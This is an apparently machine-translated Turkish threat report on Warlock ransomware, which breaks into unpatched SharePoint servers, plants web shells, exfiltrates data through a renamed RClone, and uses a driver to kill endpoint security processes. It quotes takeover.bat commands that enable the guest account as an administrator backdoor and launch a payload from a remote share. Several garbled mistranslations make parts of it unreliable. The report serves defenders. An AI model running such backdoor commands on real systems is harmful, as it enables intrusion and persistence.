Son haftalarda, siber güvenlik topluluğu, Falcıkurumsal ağlara sızmak için takılmamış Microsoft SharePoint sunucularını silahlandıran yeni bir fidye yazılımı suşu.
İlk analiz, tehdit aktörlerinin özel olarak hazırlanmış HTTP sonrası istekleri aracılığıyla kamuya açık olan SharePoint örneklerini kullandıklarını ve hedef ortamda uzaktan kod yürütme sağlayan web kabuklarını dağıttığını ortaya koymaktadır.
Bu dayanaktan, Warlock operatörleri ayrıcalıkları artırır, kimlik bilgilerini hasat eder ve hem yerleşik Windows yardımcı programlarını hem de özel kötü amaçlı yazılım bileşenlerini kullanarak yanal olarak hareket eder.
Yük nihayetinde kritik verileri şifreler ve “.x2anylock” uzantısı altında fidye talep ederek hassas dosyaları püskürtür.
Trend Micro analistleri, Warlock’un ilk olarak Haziran 2025’te SharePoint kimlik doğrulaması ve serileştirme mekanizmalarındaki güvenlik açıklarından kısa bir süre sonra yeraltı forumlarında ortaya çıktığını belirtti.
Grup, günler içinde dünya çapında hükümet, finans ve üretim sektörlerinde birden fazla yüksek profilli kurban talep etti.
Araştırmacılar, sızdırılan Lockbit 3.0 oluşturucuyu anımsatan kod kalıplarını belirlediler, bu da Warlock’un tamamen orijinal bir yaratımdan ziyade özelleştirilmiş bir türev olabileceğini düşündürdü.
Bu bağlılık, müzakere taktikleri ve fidye notu biçimlendirmesindeki benzerliklerle daha da desteklenmektedir.
Warlock’un etkisi şifrelemenin ötesine uzanır. Bir saldırının son aşamasında, operatörler, kimlik bilgilerini, belgeleri ve veritabanı dosyalarını harici bulut depolama alanına sifonlamak için trendsecurity.exe olarak yeniden tasarlanmış meşru senkronizasyon aracı RCLone kullanırlar. Bu pesfiltrasyon aşaması, hedefi gizlemek için brülör kimlik bilgilerinden yararlanarak bir proton sürücü arka ucu kullanır.
Buna ek olarak, fidye yazılımı, Trend Micro’nun kendi NetAgent ve VoneaVentConsoletray dahil olmak üzere güvenlik süreçlerini öldürmek için kötü amaçlı bir sürücüyü (Googleapiutil64.sys) dağıtarak uç nokta koruma hizmetlerini devre dışı bırakır veya sonlandırır.
.webp)
Bu tür eylemler, Warlock’un savunma başvurusu taktiklerinin karmaşıklığını vurgular. Warlock’un gizli yaklaşımını örnekleyen kritik bir subtopiktir. kalıcılık mekanizması.
Bir web kabuğunu başarıyla yükledikten sonra, saldırganlar bir arka kapı hesabının oluşturulmasını ve planlanan görevlerin kurulumunu otomatikleştiren takeover.bat adlı bir toplu komut dosyası kullanır.
Senaryo, yerleşik “konuk” hesabını etkinleştirerek ve yerel yöneticiler grubuna ekleyerek başlar:-
net user guest P@ssw0rd! /active:yes
net localgroup administrators guest /addArdından, uzak bir paylaşımdan kötü niyetli yük ve yardımcı araçları şu şekilde kullanarak C: \ Users \ public \ ‘e kopyalar:-
cmd[.]exe /c copy \\10.0.0.5\tools\* C:\Users\Public\ /y
start /B C:\Users\Public\payload.exeBu, yükün sistemin yeniden başlatılmasını ve minimum inceleme altında çalışmaya devam etmesini sağlar.
Araştırmacılar, komut dosyasının, iyileştirme girişimleri yapılırsa arka kapı hesabını eski haline getirmek için “devralma” adlı yeni bir grup politika nesnesi oluşturduğunu belirlediler.
.webp)
Web kabuğu sömürüsünü, grup politikası kötüye kullanımı ve sürücü tabanlı süreç feshini birleştirerek Warlock, tehlikeye atılan ağlarda esnek bir varlık elde eder.
Modüler tasarımı ve meşru kamu hizmetlerinin kullanımı, tespit ve yanıt çabalarını daha da karmaşıklaştırmaktadır.
Kuruluşlar SharePoint güvenlik açıklarını yamaya devam ettikçe, savunucular anormal GPO modifikasyonlarını, olağandışı servis kurulumlarını ve büyücü ile enfekte ortamları algılamak ve azaltmak için genel klasörlerdeki ikili dosyaları da izlemelidir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.